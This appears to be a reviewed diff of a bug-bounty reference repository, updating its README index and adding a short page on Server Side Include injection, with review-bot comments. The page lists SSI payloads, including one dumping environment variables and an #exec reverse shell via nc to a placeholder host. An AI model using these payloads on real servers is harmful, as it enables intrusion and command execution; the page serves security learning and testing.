    README.md
    skipped 17 lines
    18 18  - [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
    19 19  - [Local File Inclusion (LFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Local%20File%20Inclusion.md)
    20 20  - [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Mass%20Assignment.md)
    21  -- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
     21 +- [NoSQL Injection (NoSQLi)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
    22 22  - [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
    23 23  - [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
    24 24  - [Remote File Inclusion (RFI)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Remote%20File%20Inclusion.md)
     25 +- [Server Side Include Injection (SSI Injection)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Include%20Injection.md)
    25 26  - [Server Side Request Forgery](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Server%20Side%20Request%20Forgery.md)
    26  -- SQL Injection (SOON)
     27 +- [SQL Injection (SQLi)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/SQL%20Injection.md)
    27 28  - [Web Cache Deception](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Deception.md)
    28 29  - [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
    29  - 
    30  -## Checklist
    31  -- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
    32  -- Register Functionality SOON!
    33 30   
    34 31  ## List Bypass
    35 32  - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
    36 33  - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
    37 34  - [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md)
    38 35  - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
     36 + 
     37 +## Checklist
     38 +- [Forgot Password Functionality](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Checklist/Forgot%20Password.md)
     39 +- Register Functionality SOON!
     40 + 
     41 +## CVEs
     42 +- CVEs 2021 (https://github.com/daffainfo/AllAboutBugBounty/blob/master/CVEs/2021)
     43 +- CVEs 2022 (SOON)
     44 +- CVEs 2023 (SOON)
    39 45   
    40 46  ## Miscellaneous
    41 47  - [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
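Review bot: The new `- CVEs 2021 (https://github.com/daffainfo/AllAboutBugBounty/blob/master/CVEs/2021)` entry at line 42 is a bare URL in parentheses, unlike every other entry in this list, which uses markdown link syntax; write it as `- [CVEs 2021](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CVEs/2021)` so it renders as a link like the rest. The same hunk renames `NoSQL Injection` to `NoSQL Injection (NoSQLi)` and adds `SQL Injection (SQLi)`, but the neighbouring `Server Side Request Forgery` entry still has no acronym while the new `Server Side Include Injection (SSI Injection)` does; consider `Server Side Request Forgery (SSRF)` for consistency. Moving the `## Checklist` block below `## List Bypass` is fine, but note it leaves a blank-line-only line (`36 + `) with trailing whitespace, as does `40 + `.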
    skipped 32 lines
    Server Side Include Injection.md
     1 +# Server Side Include Injection (SSI Injection)
     2 + 
     3 +## Introduction
     4 +SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
     5 + 
     6 +## Where to find
     7 +Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
     8 + 
     9 +## How to exploit
     10 +1. Print a date
     11 +```
     12 +<!--#echo var="DATE_LOCAL" -->
     13 +```
     14 + 
     15 +2. Print all the variabels
     16 +```
     17 +<!--#printenv -->
     18 +```
     19 + 
     20 +3. Include a file
     21 +```
     22 +<!--#include file="includefile.html" -->
     23 +```
     24 + 
     25 +4. Doing a reverse shell
     26 +```
     27 +<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
     28 +```
     29 + 
     30 +## References
     31 +* [OWASP](https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection)
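Review bot: "variabels" at line 15 is a typo for "variables", and the Introduction sentence at line 4 has no terminating period. The four fenced blocks (lines 11, 16, 21, 26) carry no language tag, so the SSI directives render without highlighting; tag them `html` like the other pages in the repository. The `#exec cmd=...` block at line 27 is the only one whose effect is not described beyond the heading, and the page says nothing about impact or mitigation: a short note that `#exec` runs an arbitrary command on the host, and a "How to prevent" section (reject or encode `<!--#` sequences in user input, and disable `#exec` in the server's SSI configuration) would make the page useful to readers fixing the issue, not only finding it. The `Where to find` text at line 7 ("Usually it can be found anywhere") is also too vague to guide anyone; say which inputs are reflected into `.shtml` or SSI-processed pages instead.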